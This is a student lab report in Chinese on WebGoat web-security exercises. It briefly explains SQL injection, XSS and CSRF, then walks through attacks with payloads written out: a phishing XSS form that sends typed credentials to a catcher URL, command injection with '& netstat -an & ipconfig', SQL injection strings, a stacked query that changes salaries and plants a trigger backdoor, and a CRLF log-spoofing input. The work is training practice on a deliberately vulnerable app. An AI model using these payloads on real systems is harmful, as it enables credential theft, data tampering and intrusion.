20145310《网络对抗》Exp9 Web安全基础实践

基础问题回答

SQL注入攻击原理，如何防御？

SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，通过执行SQL语句进执行攻击者所要的操作。
如何防御？首先严格区分普通用户和管理员用户的权限，强迫使用参数化语句，加强对用户输入的验证，多使用SQL Server数据库自带的安全参数。

XSS攻击的原理，如何防御？

XSS是代码注入的一种，它允许恶意用户将代码注入到网页上，并能够被浏览器成功的执行，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。XSS攻击的主要目的是，想办法获取目标攻击网站的cookie，因为有了cookie相当于有了seesion，有了这些信息就可以在任意能接进互联网的pc登陆该网站，并以其他人的身份登陆，做一些破坏。

设置过滤语句，对于代码、可执行语句等一律过滤掉。
检查用户输入的内容中是否有非法内容，如尖括号、引号等，严格控制输出。

CSRF攻击原理，如何防御？

- CSRF攻击原理主要是用其他用户的身份访问网站并利用网站生成的cookie向服务器发送请求，因为该请求不是用户本意，所以称为“跨站请求伪造”。

实践内容

关于WebGoat

首先开启webgoat，使用命令java -jar webgoat-container-7.0.1-war-exec.jar

在浏览器输入localhost:8080/WebGoat，进入webgoat，默认用户名和密码，登录

Cross-Site Scripting（XSS）练习

Phishing with XSS

利用XSS可以在已存在的页面中进一步添加元素的特点，先创建一个form，让受害人在我们创建的form中填写用户名和密码，再添加一段JavaScript代码，读取受害人输入的用户名和密码，并且将这些信息发送给http://localhost:8080/WebGoat/catcher?PROPERTY=yes...，完整的XSS攻击代码如下：

</form><script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script><form name="phish"><br><br><HR><H2>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

首先在搜索框中输入攻击代码后点击，会看到一个要求输入用户名密码的表单

输入用户名密码，点击登录，WebGoat会将你输入的信息捕获并反馈

攻击成功

Stored XSS Attacks

直接在message中输入代码<script>alert("20145310 attack succeed!");</script>，

title输入随意，提交后，点击刚刚创建的帖子，攻击成功

Reflected XSS Attacks

在反射型XSS攻击，攻击者可以制作一个URL攻击脚本发送到另一个网站，电子邮件，或让受害者点击它。

当我们输入错误用户信息后，服务器校验输入有误，返回错误页面并将错误内容展示给我们

如果将带有攻击性的URL输入，继续输入上面那行代码，就会弹出对话框说明攻击成功

这个XSS攻击是费持久化的，需要诱骗用户去点击链接才能触发，总体来说上面的更危险。

Cross Site Request Forgery(CSRF)

目的是要写一个URL诱使其他用户点击，从而触发CSRF攻击，我们可以以图片的的形式将URL放进Message框用户一旦点击图片，就会开始攻击。

首先车看Parameters值，然后在message中输入代码

攻击成功。

CSRF Prompt By-Pass

这次攻击需要转账请求和确认转账成功请求。需要额外传递两个参数给服务器

在浏览器中手动输入URL：localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000进入确认转账请求页面：

点击CONFIRM按钮后，再在浏览器中输入URL：localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM，成功转走了5000元

Injection Flaws练习

Command Injection

这个题目需要用到火狐的查看源代码的插件，右上角的Firebug。首先对源代码进行修改，比如在BackDoors.help旁边加上"& netstat -an & ipconfig"

下拉菜单后就能看到修改后的值

点击view，看到命令已经被执行了。

Numeric SQL Injection

注入SQL字符串，使其可以查看所有天气的数据。利用firebug在任意一个值后面加上 or 1=1（永真）

点击GO，就能看到所有天气

Log Spoofing

我们输入的用户名会被追加到日志文件中，所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”，在User Name文本框中输入20145310%0d%0aLogin Succeeded for username: admin

攻击成功

String SQL Injection

基于select语句构造SQL注入字符串，在文本框中输入' or 1=1 --

点Go，攻击成功，所有用户信息都被显示出来：

LAB:SQL Injection(Stage 1:String SQL Injection)

重新登录，成功

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

用上一题的办法先以用户名Larry登录，登录之后看到浏览员工信息的按钮是ViewProfile

这个地方是以员工ID作为索引传递参数的，进入源代码，把其中的value值改为101 or 1=1 order by salary desc --，这样老板的信息就会被排到第一个。

之后就可以查看到老板的信息

Database Backdoors

先输一个101，得到了该用户的信息

可以发现输入的语句没有验证，很容易进行SQL注入，输入注入语句：101; update employee set salary=19999，成功把该用户的工资涨到了19999

接下来使用语句101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145310@163.com' WHERE userid = NEW.userid创建一个后门，把表中所有的邮箱和用户ID都设为自己的

Blind Numeric SQL Injection

这个题目需要捕获包。首先打开Burpsuite

设置代理“Proxy”的“Options”选项

默认是8080端口被占用时需要添加一个新的端口8888，点击add

添加后勾选，如图所示

打开浏览器右侧选项卡，preference-advanced-settings

相当于将burpsuite当成中间服务器，每个数据包都流过它。

设置好之后回到题目，任意选择一项，点击GO，然后回到burpsuite。发现多了捕获的包：

右键send to repeater ，我们修改station值从为101 为 101 or 1=1,点击GO

回到Proxy中点击Intercept is on对剩下的包不作处理，回到火狐发现已经成功